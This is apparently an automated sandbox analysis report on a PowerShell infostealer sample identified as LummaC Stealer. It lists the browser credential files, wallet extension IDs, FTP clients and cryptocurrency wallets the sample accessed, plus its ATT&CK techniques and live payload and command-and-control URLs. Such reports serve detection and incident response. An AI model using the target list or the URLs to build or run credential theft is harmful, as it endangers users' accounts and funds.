                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior

                  Remote Access Functionality

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		111
                  Process Injection                  		1
                  Masquerading                  		2
                  OS Credential Dumping                  		321
                  Security Software Discovery                  		Remote Services1
                  Screen Capture                  		21
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  PowerShell                  		Boot or Logon Initialization Scripts1
                  DLL Side-Loading                  		221
                  Virtualization/Sandbox Evasion                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
                  Process Injection                  		Security Account Manager221
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin Shares41
                  Data from Local System                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                  Deobfuscate/Decode Files or Information                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object Model2
                  Clipboard Data                  		114
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information                  		LSA Secrets11
                  File and Directory Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Software Packing                  		Cached Domain Credentials23
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582291 Sample: lumma.ps1 Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 25 cdn1.klipbazyxui.shop 2->25 27 advicebedsu.click 2->27 39 Suricata IDS alerts for network traffic 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 11 other signatures 2->45 8 powershell.exe 19 2->8         started        signatures3 process4 signatures5 47 Found many strings related to Crypto-Wallets (likely being stolen) 8->47 49 Bypasses PowerShell execution policy 8->49 51 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->51 11 powershell.exe 15 16 8->11         started        15 conhost.exe 8->15         started        process6 dnsIp7 29 cdn1.klipbazyxui.shop 104.21.72.190, 443, 49730 CLOUDFLARENETUS United States 11->29 53 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 11->53 55 Found suspicious powershell code related to unpacking or dynamic code loading 11->55 57 Injects a PE file into a foreign processes 11->57 17 powershell.exe 11->17         started        21 conhost.exe 11->21         started        signatures8 process9 dnsIp10 23 advicebedsu.click 104.21.84.241, 443, 49916, 49922 CLOUDFLARENETUS United States 17->23 31 Query firmware table information (likely to detect VMs) 17->31 33 Found many strings related to Crypto-Wallets (likely being stolen) 17->33 35 Tries to harvest and steal ftp login credentials 17->35 37 2 other signatures 17->37 signatures11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  lumma.ps15%ReversingLabs
                  lumma.ps13%VirustotalBrowse

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://cdn1.klipbazyxui.shop0%Avira URL Cloudsafe
                  https://cdn1.klipbazyxui.shop/singl5.csx0%Avira URL Cloudsafe
                  https://advicebedsu.click:443/api0%Avira URL Cloudsafe
                  http://www.microsoft.co-0%Avira URL Cloudsafe
                  http://www.microsoft.$0%Avira URL Cloudsafe
                  https://advicebedsu.click/api0%Avira URL Cloudsafe
                  https://advicebedsu.click/XUr0%Avira URL Cloudsafe
                  https://advicebedsu.click/api80%Avira URL Cloudsafe
                  https://advicebedsu.click:443/apiz0%Avira URL Cloudsafe
                  https://advicebedsu.click/pi0%Avira URL Cloudsafe
                  https://advicebedsu.click/0%Avira URL Cloudsafe
                  advicebedsu.click0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  cdn1.klipbazyxui.shop
                  		104.21.72.190
                  		truetrue
                    		unknown
                    advicebedsu.click
                    		104.21.84.241
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      scentniej.buzzfalse
                        		high
                        https://cdn1.klipbazyxui.shop/singl5.csxtrue
                        • Avira URL Cloud: safe
                        		unknown
                        rebuildeso.buzzfalse
                          		high
                          appliacnesot.buzzfalse
                            		high
                            screwamusresz.buzzfalse
                              		high
                              cashfuzysao.buzzfalse
                                		high
                                inherineau.buzzfalse
                                  		high
                                  https://advicebedsu.click/apitrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  prisonyfork.buzzfalse
                                    		high
                                    hummskitnj.buzzfalse
                                      		high
                                      advicebedsu.clicktrue
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1807008792.0000016DE0804000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1807008792.0000016DE0947000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2537626425.0000000005A7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://cdn1.klipbazyxui.shoppowershell.exe, 00000002.00000002.2537626425.0000000004B67000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://stackoverflow.com/q/14436606/23354powershell.exe, 00000002.00000002.2614845846.0000000006EF0000.00000004.08000000.00040000.00000000.sdmpfalse
                                          		high
                                          https://github.com/mgravell/protobuf-netJpowershell.exe, 00000002.00000002.2614845846.0000000006EF0000.00000004.08000000.00040000.00000000.sdmpfalse
                                            		high
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2537626425.0000000004B67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2616078952.0000000007180000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2537626425.0000000004B67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2616078952.0000000007180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Licensepowershell.exe, 00000002.00000002.2537626425.0000000005A7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.2537626425.0000000005A7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
